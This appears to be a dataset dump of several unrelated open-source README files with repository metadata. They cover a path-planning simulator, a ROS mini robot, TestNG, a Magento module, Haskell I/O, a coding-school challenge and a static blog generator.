Noise) ["x"] The car's x position in map coordinates ["y"] The car's y position in map coordinates ["s"] The car's s position in frenet coordinates ["d"] The car's d position in frenet coordinates ["yaw"] The car's yaw angle in the map ["speed"] The car's speed in MPH #### Previous path data given to the Planner //Note: Return the previous list but with processed points removed, can be a nice tool to show how far along the path has processed since last time. ["previous_path_x"] The previous list of x points previously given to the simulator ["previous_path_y"] The previous list of y points previously given to the simulator #### Previous path's end s and d values ["end_path_s"] The previous list's last point's frenet s value ["end_path_d"] The previous list's last point's frenet d value #### Sensor Fusion Data, a list of all other car's attributes on the same side of the road. (No Noise) ["sensor_fusion"] A 2d vector of cars and then that car's [car's unique ID, car's x position in map coordinates, car's y position in map coordinates, car's x velocity in m/s, car's y velocity in m/s, car's s position in frenet coordinates, car's d position in frenet coordinates. ## Details 1. The car uses a perfect controller and will visit every (x,y) point it recieves in the list every .02 seconds. The units for the (x,y) points are in meters and the spacing of the points determines the speed of the car. The vector going from a point to the next point in the list dictates the angle of the car. Acceleration both in the tangential and normal directions is measured along with the jerk, the rate of change of total Acceleration. The (x,y) point paths that the planner recieves should not have a total acceleration that goes over 10 m/s^2, also the jerk should not go over 50 m/s^3. (NOTE: As this is BETA, these requirements might change. Also currently jerk is over a .02 second interval, it would probably be better to average total acceleration over 1 second and measure jerk from that. 2. There will be some latency between the simulator running and the path planner returning a path, with optimized code usually its not very long maybe just 1-3 time steps. During this delay the simulator will continue using points that it was last given, because of this its a good idea to store the last points you have used so you can have a smooth transition. previous_path_x, and previous_path_y can be helpful for this transition since they show the last points given to the simulator controller with the processed points already removed. You would either return a path that extends this previous path or make sure to create a new path that has a smooth transition with this last path. ## Tips A really helpful resource for doing this project and creating smooth trajectories was using http://kluge.in-chemnitz.de/opensource/spline/, the spline function is in a single hearder file is really easy to use. --- ## Dependencies * cmake >= 3.5 * All OSes: [click here for installation instructions](https://cmake.org/install/) * make >= 4.1 * Linux: make is installed by default on most Linux distros * Mac: [install Xcode command line tools to get make](https://developer.apple.com/xcode/features/) * Windows: [Click here for installation instructions](http://gnuwin32.sourceforge.net/packages/make.htm) * gcc/g++ >= 5.4 * Linux: gcc / g++ is installed by default on most Linux distros * Mac: same deal as make - [install Xcode command line tools]((https://developer.apple.com/xcode/features/) * Windows: recommend using [MinGW](http://www.mingw.org/) * [uWebSockets](https://github.com/uWebSockets/uWebSockets) * Run either `install-mac.sh` or `install-ubuntu.sh`. * If you install from source, checkout to commit `e94b6e1`, i.e. ``` git clone https://github.com/uWebSockets/uWebSockets cd uWebSockets git checkout e94b6e1 ```
61.223368
887
0.775427
eng_Latn
0.998636
bb1e79a568b39bf8b4a400a458aa12562000103b
3,196
md
Markdown
readme.md
swapdha/hypharos_minibot
baebdcb806ec57cffa457ab526d08a8527b624df
[ "Apache-2.0" ]
30
2018-01-29T15:43:41.000Z
2021-03-18T19:18:37.000Z
readme.md
swapdha/hypharos_minibot
baebdcb806ec57cffa457ab526d08a8527b624df
[ "Apache-2.0" ]
7
2018-03-28T13:45:00.000Z
2018-12-04T07:58:18.000Z
readme.md
swapdha/hypharos_minibot
baebdcb806ec57cffa457ab526d08a8527b624df
[ "Apache-2.0" ]
25
2018-02-25T15:48:42.000Z
2022-01-12T05:40:25.000Z
# HyphaROS MiniBot pkg ![alt text](https://github.com/Hypha-ROS/hypharos_minibot/blob/master/document/logo/HyphaROS_logo_2.png) ## Abstract Low cost, user friendly Pi3 based mini robot for ROS developing ! Fully open-sourced (hardware & software), total cost <300USD. ![alt text](https://github.com/Hypha-ROS/hypharos_minibot/blob/master/document/HyphaROS_MiniBot_photo.jpg) ## About us FB Page: https://www.facebook.com/HyphaROS/ Website: https://hypharosworkshop.wordpress.com/ Contact: [email protected] Developer: * HaoChih, LIN Date: 2018/02/25 License: Apache 2.0 ## Features * Onboard mapping (ICP, Gmapping) * STM32 for CL motor speed control * AMCL localization * Dynamic obstacle avoidance ## Roadmap * Documentation * ROS 2.0 Multi-robots * Video tutorial ## Workshop slides HyphaROS 1 day workshop for ROS beginner: https://drive.google.com/open?id=1c4hmHLAmqBQ6BlPqjn0Ndqc4kjcha3j_QZMlMWGZYFE ## Hardware * Raspberry Pi3 * YDLidar X4 * STM32(F103) MCU (with OLED display, bluetooth) * Diff Motor with A/B encoder(res: 340) * MPU6050 or GY85 Total Cost: < 300 USD ## Software ### Pi3 Image Image file for Pi3.(with SD card >=16G, password: hypharos, 20180807) https://drive.google.com/open?id=1T_zAk-VCeltvmmS3WjbETF68ym1zlGih (if your SD card is around 13GB, it's OK to force Win32DiskImager to write the file!) ### For mpu6050 SSH to Pi3, then open a terminal: $ sudo apt install python-smbus $ sudo pip install mpu6050-raspberrypi ### STM32 (MCU) Source codes (ver.20180808): https://drive.google.com/open?id=15vc5UbdY-Elm-RBjZC8SI0G9rtcqtslp ### Desktop Windows VirtualBox Image (password: hypharos): https://drive.google.com/open?id=1xTVsPet6WT48Psete6iIkgg-gi1QdOht ### Desktop Ubuntu (16.04) 64bit RAM > 4G Install ROS Kinetic - (Desktop-Full Install) (http://wiki.ros.org/kinetic/Installation/Ubuntu) $ sudo apt-get install remmina synaptic gimp git ros-kinetic-navigation ros-kinetic-amcl ros-kinetic-slam-gmapping ros-kinetic-mrpt-slam ros-kinetic-mrpt-icp-slam-2d ros-kinetic-robot-localization -y create your own catkin_ws (http://wiki.ros.org/ROS/Tutorials/InstallingandConfiguringROSEnvironment#Create_a_ROS_Workspace) $ cd catkin_ws/src $ git clone https://github.com/EAIBOT/ydlidar $ git clone https://github.com/Hypha-ROS/hypharos_minibot $ cd .. $ catkin_make ## Operation ### Ethernet Connection The default static eth IP on Pi3 image is 10.0.0.1, hence, to connect to your Pi3 through cable, please set your host IP as 10.0.0.X Notice: for the first bootup, you have to update Pi3 MAC address through HDMI Dispaly! ### Wifi Connection Use ethernet or display connection to make Pi3 connect to your local Wifi AP. Remember to set ROS_MASTER_URI and ROS_IP in .bashrc file in Pi3 image home folder. ### Mapping $ roslaunch hypharos_minibot HyphaROS_MiniBot_Gmapping.launch OR $ roslaunch hypharos_minibot HyphaROS_MiniBot_ICP.launch ### Navigation After mapping and modify two maps file (one for amcl, one for nav) in map folder located in hypharos pkg, execute the command: $ roslaunch hypharos_minibot HyphaROS_MiniBot_Nav.launch
34
201
0.751252
eng_Latn
0.31187
bb1f12854ab0ab2aa66e630f783c5b37b9916a69
3,013
md
Markdown
README.md
leandjb/testng
34c09b7da76850c0ea61551c877fb566e7d95fc2
[ "Apache-2.0" ]
null
null
null
README.md
leandjb/testng
34c09b7da76850c0ea61551c877fb566e7d95fc2
[ "Apache-2.0" ]
null
null
null
README.md
leandjb/testng
34c09b7da76850c0ea61551c877fb566e7d95fc2
[ "Apache-2.0" ]
null
null
null
[![Maven Central](https://img.shields.io/maven-central/v/org.testng/testng.svg)](https://maven-badges.herokuapp.com/maven-central/org.testng/testng) [![License](https://img.shields.io/github/license/cbeust/testng.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) [![Sonarqube tech debt](https://img.shields.io/sonar/https/sonarqube.com/org.testng:testng/tech_debt.svg?label=Sonarqube%20tech%20debt)](https://sonarqube.com/dashboard/index?id=org.testng:testng) [![Sonarqube Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=org.testng%3Atestng&metric=alert_status)](https://sonarcloud.io/dashboard?id=org.testng%3Atestng) Documentation available at [TestNG's main web site](https://testng.org). ### Release Notes * [7.4.0](https://groups.google.com/g/testng-users/c/dwSJ04qeu8k) * [7.3.0](https://groups.google.com/forum/#!topic/testng-users/a81uaZvtEZI) * [7.1.0](https://groups.google.com/forum/#!topic/testng-users/84bYPJ1rjno) * [7.0.0](https://groups.google.com/forum/#!topic/testng-users/HKujuefBhXA) ### Need help? Before opening a new issue, did you ask your question on * [Google group](https://groups.google.com/group/testng-users) * [StackOverflow](https://stackoverflow.com/questions/tagged/testng) If you posted on both sites, please provide the link to the other question to avoid duplicating the answer. ### Are you sure it is a TestNG bug? Before posting the issue, try to reproduce the issue in [a shell window](https://testng.org/doc/documentation-main.html#running-testng). If the problem does not exist with the shell, first check if the issue exists on the bugtracker of the runner, and open an issue there first: * Eclipse: https://github.com/cbeust/testng-eclipse/issues * IntelliJ: [https://youtrack.jetbrains.com/issues](https://youtrack.jetbrains.com/issues?q=Subsystem:%20%7BJava.%20Tests.%20TestNG%7D) * Maven: https://issues.apache.org/jira/browse/SUREFIRE * Gradle: https://issues.gradle.org/projects/GRADLE ### Which version are you using? Always make sure your issue is happening on the latest TestNG version. Bug reports occurring on older versions will not be looked at quickly. ### Have you considered sending a pull request instead of filing an issue? The best way to report a bug is to provide the TestNG team with a full test case reproducing the issue. Maybe you can write a runnable test case (check the `src/test/` folder for examples) and propose it in a pull request Don't worry if the CI fails because it is the expected behavior. This pull request will be a perfect start to find the fix :) ### How to create a pull request? Refer our [Contributing](./CONTRIBUTING.md) section for detailed set of steps. ### We encourage pull requests that: * Add new features to TestNG (or) * Fix bugs in TestNG If your pull request involves fixing SonarQube issues then we would suggest that you please discuss this with the [TestNG-dev](https://groups.google.com/forum/#!forum/testng-dev) before you spend time working on it.
60.26
196
0.76535
eng_Latn
0.715034
bb1fb281bc0b1e9a368190b61887767778c9e4a8
82
md
Markdown
README.md
nemoxps/db-base
396727a405f43fc00bfd890fbdc5114a536e3977
[ "MIT" ]
null
null
null
README.md
nemoxps/db-base
396727a405f43fc00bfd890fbdc5114a536e3977
[ "MIT" ]
null
null
null
README.md
nemoxps/db-base
396727a405f43fc00bfd890fbdc5114a536e3977
[ "MIT" ]
null
null
null
# db-base ## Installation ```sh $ npm install nemoxps/db-base ``` ## License MIT
9.111111
29
0.646341
kor_Hang
0.208013
bb20013c4062664693461f10673d115688b18bd0
5,476
md
Markdown
haskell/haskell_io/readme.md
gokyo/study-category-theory
f34e32165c04271a565c626d7e4c9b16725eb7bb
[ "Apache-2.0" ]
null
null
null
haskell/haskell_io/readme.md
gokyo/study-category-theory
f34e32165c04271a565c626d7e4c9b16725eb7bb
[ "Apache-2.0" ]
null
null
null
haskell/haskell_io/readme.md
gokyo/study-category-theory
f34e32165c04271a565c626d7e4c9b16725eb7bb
[ "Apache-2.0" ]
null
null
null
# Haskell and side effects Its funny, I want to learn Haskell, and sure enough I feel the need to do some side effects with it, like say a Hello World! Skimming through [Introduction to Haskell IO/Actions](https://wiki.haskell.org/Introduction_to_Haskell_IO/Actions) I found that we must use Actions to manipulate the world. To create a program that does side effects, just create a file `hello.hs` and put the following in it: ```haskell main :: IO () main = putStrLn "Hello World!" ``` We can compile this small little program to native code (how cool is that) using the `ghc` compiler: ```bash $ ghc hello.hs [1 of 1] Compiling Main ( hello.hs, hello.o ) Linking hello ... ``` This will create the following files: ```bash -rwxr-xr-x 1 dennis dennis 1,3M 15 apr 22:06 hello -rw-r--r-- 1 dennis dennis 657B 15 apr 22:06 hello.hi -rw-r--r-- 1 dennis dennis 37B 15 apr 22:06 hello.hs -rw-r--r-- 1 dennis dennis 1,9K 15 apr 22:06 hello.o ``` We can now launch the binary `hello`: ```bash $ ./hello Hello World! ``` # Writing to files The book [Real World Haskell - Chapter 7. I/O](http://book.realworldhaskell.org/read/io.html) which is available online for free has an example on how to write to a file. To write to a file we should use the [writeFile](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#v:writeFile) [IO computation](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#t:IO). > A computation is a concept that does not result at all, until you run it. So a computation must be run. - [Haskell Mailing List: Computation vs Function](https://mail.haskell.org/pipermail/beginners/2009-April/001568.html) > A value of type `IO` a is a computation (also known as IO Action) which, when performed, does some I/O before returning a value of type a. - [Haskell Documentation: Basic Input and output](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#t:IO) Create a file `writefile.hs` and put the following in it: ```haskell import Data.Char(toUpper) main :: IO () main = do let name = "dennis" writeFile "writefile.txt" (map toUpper name) ``` Compile and run it: ```bash $ ghc writefile.hs [1 of 1] Compiling Main ( writefile.hs, writefile.o ) Linking writefile ... $ ./writefile $ cat writefile.txt DENNIS ``` Nice it works :) # Haskell and I/O Haskell strictly separates pure code from code that could cause things to occur in the world. That is, it provides a complete isolation from side-effects in pure code. Besides helping programmers to reason about the correctness of their code, it also permits compilers to automatically introduce optimizations and parallelism. IO is a computation, it needs a way to be run. More generally speaking, IO is a mathematical structure called a monad. For now we can think of a monad, as a mathematical structure that is design pattern that helps function composability (combining functions). When we read the [Haskell Documentation about IO](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#t:IO) it states that: > IO is a monad, so IO actions can be combined using either the do-notation or the >> and >>= operations from the Monad class. - [Haskell Documentation: Basic Input and output](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#t:IO) Another way to think about monads is that they give an execution context to a function, a way for the function to manipulate a world, the context, and in case of the IO monad, it manipulates the world of the computer using I/O semantics. # Basic Input/Output Most of the time we need to sequence the manipulations we do to the outside world for example: 1. We need to greet the user and ask for their name, 2. We need to capture the users input 3. We need to greet the user with their name. This is a sequence of steps that can be modelled using Haskells IO monad using a sequence of IO actions. Each IO action is an IO monad. The monad design pattern is such that monads can be sequenced just like the description. Lets create a simple program that asks for the user's name, capture the input and greets the user with their name. Create a file `basicio.hs` and put the following code in it: ```Haskell main :: IO () main = do putStrLn "Greetings! What is your name?" inpStr <- getLine putStrLn ("Welcome to Haskell, " ++ inpStr ++ "!") ``` Let's use another command that can interpret our Haskell code: ```bash $ runghc basicio.hs Greetings! What is your name? Dennis Welcome to Haskell, Dennis! ``` You can see that [putStrLn](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#v:putStrLn) writes out a String, followed by an end-of-line character. [getLine](http://hackage.haskell.org/package/base-4.8.2.0/docs/Prelude.html#v:getLine) reads a line from standard input. The `<-` syntax binds the result from executing an I/O action to a name. We use the simple list concatenation operator `++` to join the input string with our own text. In Scala it would be something like this: ```scala scala> for { | _ <- Some(println("Greetings! What is your name?")) | inpStr <- Option(scala.io.StdIn.readLine()) | _ <- Some(println("Welcome to Scala, " + inpStr + "!")) | } yield () Greetings! What is your name? Welcome to Scala, Dennis! res1: Option[Unit] = Some(()) ``` Please note that I have very much misused to Option monad for it to work...
40.562963
262
0.728086
eng_Latn
0.993368
bb20b159b6a2408ea526db80fde821761aa78754
1,633
md
Markdown
docs/USAGE.md
vrushti-mody/Productive.ly
71910d2a7e5324fb9f8242799a9fe533cf77ae67
[ "MIT" ]
1
2021-03-18T20:05:55.000Z
2021-03-18T20:05:55.000Z
docs/USAGE.md
vrushti-mody/Productive.ly
71910d2a7e5324fb9f8242799a9fe533cf77ae67
[ "MIT" ]
17
2021-03-14T15:37:31.000Z
2021-05-02T07:56:46.000Z
docs/USAGE.md
vrushti-mody/Productive.ly
71910d2a7e5324fb9f8242799a9fe533cf77ae67
[ "MIT" ]
1
2021-04-06T15:49:33.000Z
2021-04-06T15:49:33.000Z
# Welcome to Productive.ly ## Guidelines to use the application - In order to start a sprint, you need to milestone your issues. You can read more about milestones[`here`](https://docs.github.com/en/github/managing-your-work-on-github/about-milestones) - If you need help with creating a milestone, refer to the docs [`here`](https://docs.github.com/en/github/managing-your-work-on-github/creating-and-editing-milestones-for-issues-and-pull-requests) - The due date of the milestone should be greater than the current date for it to be visible in the application. ## What are sprints? A Sprint is a short, time-boxed period during which a Scrum Team works to complete the set amount of work. Sprints are at the core of Scrum, and by getting them right, companies can help agile teams ship high-quality software, faster and more frequently. Most importantly, working in Sprints gives teams more flexibility and allows easier (and less costly) adaptation to change. ## How can Github Milestones be used for creating Sprints? - GitHub doesn’t have the notion of a “sprint”, but it does have a similar metaphor: a Milestone. - Each Milestone has only three elements: a Title, a Body, and an optional due date. - By setting the due dates of milestones to be in the coming week or two, you can start sprinting ## How does our application help? - Our application helps keep track of the backlogs in each sprint/ milestone - It gamifies the sprint system to boost the productivity of employees - It creates a leaderboard with the top contributions of employees so that the management knows the top contributors in the company
56.310345
378
0.779547
eng_Latn
0.999241
bb21380523a8a051d76069f1065202679e81d847
4,922
md
Markdown
7-assets/past-student-repos/Lambda-School-master/Week 3/Sprint-Challenge/README.md
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
7-assets/past-student-repos/Lambda-School-master/Week 3/Sprint-Challenge/README.md
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
7-assets/past-student-repos/Lambda-School-master/Week 3/Sprint-Challenge/README.md
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
# Sprint Challenge: JavaScript Fundamentals This challenge allows you to practice the concepts and techniques learned over the past week and apply them in a survey of problems. This Sprint explored JavaScript Fundamentals. During this Sprint, you studied variables, functions, object literals, arrays, this keyword, prototypes, and class syntax. In your challenge this week, you will demonstrate proficiency by completing a survey of JavaScript problems. ## Instructions **Read these instructions carefully. Understand exactly what is expected _before_ starting this Sprint Challenge.** This is an individual assessment. All work must be your own. Your challenge score is a measure of your ability to work independently using the material covered through this sprint. You need to demonstrate proficiency in the concepts and objectives introduced and practiced in preceding days. You are not allowed to collaborate during the Sprint Challenge. However, you are encouraged to follow the twenty-minute rule and seek support from your PM and Instructor in your cohort help channel on Slack. Your work reflects your proficiency in JavaScript fundamentals. You have three hours to complete this challenge. Plan your time accordingly. ## Commits Commit your code regularly and meaningfully. This helps both you (in case you ever need to return to old code for any number of reasons) and your project manager. ## Description You will notice there are several JavaScript files being brought into the index.html file. Each of those files contain JavaScript problems you need to solve. If you get stuck on something, skip over it and come back to it later. In meeting the minimum viable product (MVP) specifications listed below, you should have a console full of correct responses to the problems given. ## Self-Study Questions Demonstrate your understanding of this week's concepts by answering the following free-form questions. Edit this document to include your answers after each question. Make sure to leave a blank line above and below your answer so it is clear and easy to read by your project manager 1. Describe the biggest difference between `.forEach` & `.map`. 2. What is the difference between a function and a method? 3. What is closure? 4. Describe the four rules of the 'this' keyword. 5. Why do we need super() in an extended class? ## Project Set up Follow these steps to set up and work on your project: - [ ] Create a forked copy of this project. - [ ] Add PM as collaborator on Github. - [ ] Clone your OWN version of Repo (Not Lambda's by mistake!). - [ ] Create a new Branch on the clone: git checkout -b `<firstName-lastName>`. - [ ] Create a pull request before you start working on the project requirements. You will continuously push your updates throughout the project. - [ ] You are now ready to build this project with your preferred IDE - [ ] Implement the project on your Branch, committing changes regularly. - [ ] Push commits: git push origin `<firstName-lastName>`. Follow these steps for completing your project: - [ ] Submit a Pull-Request to merge <firstName-lastName> Branch into master (student's Repo). - [ ] Add your Project Manager as a Reviewer on the Pull-request - [ ] PM then will count the HW as done by merging the branch back into master. ## Minimum Viable Product Your finished project must include all of the following requirements: **Pro tip for this challenge: If something seems like it isn't working locally, copy and paste your code up to codepen and take another look at the console.** ## Task 1: Objects and Arrays Test your knowledge of objects and arrays. * [ ] Use the [objects-arrays.js](challenges/objects-arrays.js) link to get started. Read the instructions carefully! ## Task 2: Functions This challenge takes a look at callbacks and closures as well as scope. * [ ] Use the [functions.js](challenges/functions.js) link to get started. Read the instructions carefully! ## Task 3: Prototypes Create constructors, bind methods, and create cuboids in this prototypes challenge. * [ ] Use the [prototypes.js](challenges/prototypes.js) link to get started. Read the instructions carefully! ## Task 4: Classes Once you have completed the prototypes challenge, it's time to convert all your hard work into classes. * [ ] Use the [classes.js](challenges/classes.js) link to get started. Read the instructions carefully! In your solutions, it is essential that you follow best practices and produce clean and professional results. Schedule time to review, refine, and assess your work and perform basic professional polishing including spell-checking and grammar-checking on your work. It is better to submit a challenge that meets MVP than one that attempts too much and does not. ## Stretch Problems There are a few stretch problems found throughout the files, don't work on them until you are finished with MVP requirements!
55.931818
410
0.78139
eng_Latn
0.999577
bb2322170038c0154879a2df5b95aeefdd813ac9
3,715
md
Markdown
README.md
fyndiq/fyndiq-magento-module
c906226df4b9c1cffe5d9eb753447658fae83872
[ "MIT" ]
null
null
null
README.md
fyndiq/fyndiq-magento-module
c906226df4b9c1cffe5d9eb753447658fae83872
[ "MIT" ]
1
2020-01-16T19:59:18.000Z
2020-01-16T19:59:18.000Z
README.md
fyndiq/fyndiq-magento-module
c906226df4b9c1cffe5d9eb753447658fae83872
[ "MIT" ]
null
null
null
# fyndiq-magento-module Fyndiq's official Magento module ## Open source This plugin is open souce and therefore free to use and modify, but it is no longer maintained by Fyndiq. If you want to update it, please fork the repository and do any changes you like in your own repository. ### Requirements * Magento 1.7- * PHP >5.2 ### Documentation You can find the latest version of this module and up to date documentation on the following page: http://developers.fyndiq.com/fyndiq-built-integrations/#magento ### INSTALL You can just drag the app directory to your magento directory to make the files get added to right place. #### Manual production installation For this you need to have a terminal and git installed. ##### Default packaging 1. Run `git clone https://github.com/fyndiq/fyndiq-magento-module.git` 2. Cd to your module directory (`cd /path/to/your/module/repo/`) 3. Run `git submodule update --init --recursive` 4. Run in repo directory `./fyndman.sh deploy /path/to/your/magento/` 5. Login to magento admin 6. Now empty cache (System > cache mangement > flush all.) 7. Now go to Fyndiq Page in admin (`System > Fyndiq import/export`) 8. Click on settings. (The settings page can get blank the first time, try to logout and login then) 9. Type in api-key and username and all the other information you wanna setup. 10. Make the fyndiq directory in magento root readable and writable. it is here the feed files will be. 11. Go back to fyndiq page. 12. It will now work! ##### Magento Connect Packaging Use this to create a package for Magento Connect 1. Update the module verion in `/src/app/code/community/Fyndiq/Fyndiq/etc/config.xml` 2. Update the `CHANGELOG` with the version used in config.xml 2. run `make build-connect` 9. You now have the package under build directory #### Development installation For this you need to have a terminal and git installed. 1. Run `git clone https://github.com/fyndiq/fyndiq-magento-module.git` 2. Cd to your module directory (`cd /path/to/your/module/repo/`) 3. Run `git submodule update --init --recursive` 4. Run in repo directory `./fyndman.sh build /path/to/your/magento/` 5. Login to magento admin 6. Go to `System > Configurations > Advanced: Developers > Set Symlink Allowed to True` 7. Now empty cache (System > cache mangement > flush all.) 8. Now go to Fyndiq Page in admin (`System > Fyndiq import/export`) 9. Click on settings. (The settings page can get blank the first time, try to logout and login then) 10. Type in api-key and username and all the other information you wanna setup. 11. Make the fyndiq directory in magento root readable and writable. it is here the feed files will be. 12. Go back to fyndiq page. 13. It will now work! ### Development For development, vagrant is used, using a local machine through virtualbox to run the environment. Go into the ./vagrant directory and issue the command `vagrant up`. Add the following host to your hostfile to be able to access it: `192.168.13.105 magento.local` ### Good to know * If you have problem after installing the module, like SQL or other problems. Test to clear cache first in admin. Install might not start because of cache and this can cause problems. * Don't remove or change SKU on a product until you are sure you won't have any new orders for that product. This can cause problem when you import orders right now. #### Products Fyndiq is trusting the product structure in Magento. Fyndiq just show configurable/parent products in module but will add all associated products to that parent product to the feed. If you don't see any products in the module, then you don't have any configurable/parent products. Add a configurable product and it will be shown.
53.071429
329
0.762584
eng_Latn
0.992621
bb232721ca2a02b609233a413e3d7813ef74ca7b
7,597
md
Markdown
README.md
BurgundyIsAPublicEnemy/burgundyisapublicenemy.github.io
44406a696729d0022a3e227d6950b3bb7be2c254
[ "MIT" ]
null
null
null
README.md
BurgundyIsAPublicEnemy/burgundyisapublicenemy.github.io
44406a696729d0022a3e227d6950b3bb7be2c254
[ "MIT" ]
null
null
null
README.md
BurgundyIsAPublicEnemy/burgundyisapublicenemy.github.io
44406a696729d0022a3e227d6950b3bb7be2c254
[ "MIT" ]
null
null
null
<div align="center"> <h1> ✍️ Vikram's amazing blog supreme deluxe, forked from Handmade! [![build](https://img.shields.io/github/workflow/status/ParkSB/handmade-blog/Node%20CI/master?style=flat-square)](https://github.com/ParkSB/handmade-blog/actions?query=workflow%3A%22Node+CI%22) ![node](https://img.shields.io/badge/node-%3E%3D%2010.0-brightgreen?style=flat-square) [![demo](https://img.shields.io/netlify/3f01acb3-1107-470a-914f-90d100b87d85?label=demo&style=flat-square)](https://handmade-blog.netlify.com/) [![license](https://img.shields.io/github/license/ParkSB/handmade-blog?style=flat-square)](LICENSE) </h1> <strong>Read this document in another language:</strong> [:kr:](README-KO.md) [:indonesia:](README-ID.md) [:brazil:](README-PT-BR.md) [:it:](README-IT.md) [:malaysia:](README-MS.md) [:greece:](README-EL.md) </div> Handmade Blog is a lightweight static blog generator for people who want to start a blog quickly. It supports article type document for a blog post, work type document for portfolio, code highlights, [KaTeX](https://katex.org/) syntax, footnotes, and more. ## Demo: [Here](https://handmade-blog.netlify.com/) ![Article page preview](https://user-images.githubusercontent.com/6410412/74097056-be43d100-4b4a-11ea-806b-7bd263d7f623.png) ## Getting Started 1. Click the 'Use this template' button above the file list to create a new repository. If you want to use github.io domain, have to name the repository `{YOUR_ID}.github.io`. (e.g., `betty-grof.github.io`) Don't forget to enable the 'Include all branches' option. ![Click the 'Use this template' button](https://user-images.githubusercontent.com/6410412/93741226-f524ae00-fc26-11ea-8f88-ba634d2de66b.png) ![Name repository to id.github.io, and enable 'Include all branches' option](https://user-images.githubusercontent.com/6410412/93741223-f48c1780-fc26-11ea-9980-8911e531a29c.png) 2. Click the 'Settings' tab in your repository, and set the source branch for GitHub Pages to `gh-pages` branch. GitHub Pages will host your website based on `gh-pages` branch. You'll be able to access the website via `https://{YOUR_ID}.github.io/` in a few minutes. ![Click the 'Settings' tab](https://user-images.githubusercontent.com/6410412/93750006-d11c9900-fc35-11ea-9ac1-4f92216f28f9.png) ![Set source branch of the github pages to gh-pages branch](https://user-images.githubusercontent.com/6410412/93741218-f2c25400-fc26-11ea-9e30-eddb9a2a3b3f.png) 3. Clone the repository, and install node packages. ```shell script $ git clone https://github.com/{YOUR_ID}/{REPOSITORY_NAME}.git # git clone https://github.com/betty-grof/betty-grof.github.io.git $ cd {REPOSITORY_NAME} # cd betty-grof.github.io $ npm install ``` 4. Modify `config.json` file in `services` directory to set your blog title and subtitle. ```json { "blogTitle": "Betty Grof", "blogSubtitle": "Oh My Glob", "article": { "tableOfContents": true } } ``` 5. Start a local server at `http://localhost:1234/`. `npm start` script opens the local server based on `server` directory. ```shell script $ npm start ``` ![The website that is titled 'Betty Grof' at http://localhost:1234/](https://user-images.githubusercontent.com/6410412/93754683-155f6780-fc3d-11ea-99de-92c747c103f9.png) 6. Commit and push the changes in your working directory to the remote repository. ```shell script $ git add ./services/config.json $ git commit -m "Set the blog title and subtitle" $ git push origin master ``` 7. Run `deploy` script if you're ready to host the website. This script builds local files to `dist` directory and pushes it to `gh-pages` branch that contains only the files in `dist` directory. GitHub Pages will host your website at `https://{YOUR_ID}.github.io/` based on `gh-pages` branch automatically. ```shell script $ npm run deploy ``` ## Usage ### Write and publish a document 1. Write a document in `_articles` or `_works` directory. 1. Run `npm run publish article` or `npm run publish work` script to convert markdown documents to HTML. 1. Preview converted document on the local server using `npm start` script. 1. Commit and push the changes to the repository, and run `npm run deploy` to deploy. ### Change a page Modify an ejs template to change the contents of the existing page. For example, if you want to put an image to the landing page, open the `app/templates/index.ejs` file, and add `img` tag to the `main-container` element. ```html <main id="main-container"> <img src="../assets/profile.jpg" alt="My profile picture" /> <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</p> </main> ``` Then, run `npm run publish page` script to publish the modified landing page and preview changes on the local server using `npm start` script. ```shell script $ npm run publish page $ npm start ``` If you're ready to deploy, run `npm run deploy` script. You can change not only the landing page but any pages like this way. (You may need to understand the project structure.) ### Project structure * `_articles` - Markdown files for the blog posts. * `_works` - Markdown files for the portfolio. * `app` * `assets` - Any files to be imported by HTML files such as image, font, etc. * `public` - HTML files generated by `publish` script. `server` and `dist` directory is based on this directory. Do not change the files under this directory directly. * `article` - HTML files converted from `_articles` directory. * `work` - HTML files converted from `_works` directory. * `src` - Source code to be imported by HTML files. * `css` - CSS files generated by `build` script. * `scss` * `ts` * `static` - Any static files that aren't compiled by `build` script like `robots.txt`, `sitemap.xml`, or SEO files. `build` script copies all files under this directory to `dist` directory. * `templates` - EJS template files. `publish` script converts templates under this directory to HTML files. * `dist` - Files compiled by `build` script. `deploy` script deploys a website to GitHub pages based on this directory. Do not change the files under this directory directly. * `server` - Files compiled by `build` script. `start` script opens local server based on this directory. Do not change the files under this directory directly. * `services` - Source code implementing `publish` script. * `classes` * `models` * `tools` - Source code implementing various npm scripts. ## Showcase * parksb.github.io: https://github.com/parksb/parksb.github.io * betty-grof.github.io: https://github.com/betty-grof/betty-grof.github.io ## Available Scripts ### `npm start` Starts local development server at http://localhost:1234/. ### `npm run publish` Converts templates to HTML files. ```shell script $ npm run publish article ``` Converts all articles. ```shell script $ npm run publish works ``` Converts all works. ```shell script $ npm run publish article 5 ``` Converts an article which id is 5. ```shell script $ npm run publish work 3 ``` Converts a work which id is 3. ```shell script $ npm run publish page ``` Converts all pages. ### `npm run watch` Rebuilds template files in `templates` directory and markdown files in `_articles` directory automatically whenever the files are modified. ### `npm run build` Builds files with parcel bundler. ### `npm run deploy` Builds and deploys the files. ## License This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
39.774869
526
0.723575
eng_Latn
0.913907
bb248aac7b13506c5e4105189ea15ccde937ddc5
19,349
md
Markdown
docs/relational-databases/native-client/features/using-multiple-active-result-sets-mars.md
antoniosql/sql-docs.es-es
0340bd0278b0cf5de794836cd29d53b46452d189
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/native-client/features/using-multiple-active-result-sets-mars.md
antoniosql/sql-docs.es-es
0340bd0278b0cf5de794836cd29d53b46452d189
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/relational-databases/native-client/features/using-multiple-active-result-sets-mars.md
antoniosql/sql-docs.es-es
0340bd0278b0cf5de794836cd29d53b46452d189
[ "CC-BY-4.0", "MIT" ]
null
null
null
